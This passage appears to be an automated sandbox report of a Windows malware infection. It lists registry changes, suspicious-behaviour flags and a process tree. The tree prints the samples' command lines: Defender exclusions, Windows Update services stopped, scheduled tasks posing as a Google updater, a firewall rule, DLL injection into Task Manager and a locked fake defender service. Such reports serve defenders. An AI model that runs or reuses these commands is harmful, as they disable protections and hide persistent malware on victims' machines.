| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oneetx.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\oneetx.exe"
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\207aa4515d" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\207aa4515d" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
"C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe"
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 2772 -ip 2772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 620
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"
C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2772 -ip 2772
C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 880
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"
C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
"C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 2772 -ip 2772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 888
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 2772 -ip 2772
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 972
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2772 -ip 2772
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 980
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2772 -ip 2772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2772 -ip 2772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 1140
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2772 -ip 2772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 1456
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe" & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "setup.exe" /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2772 -ip 2772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 1408
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
"C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\System32\cmd.exe
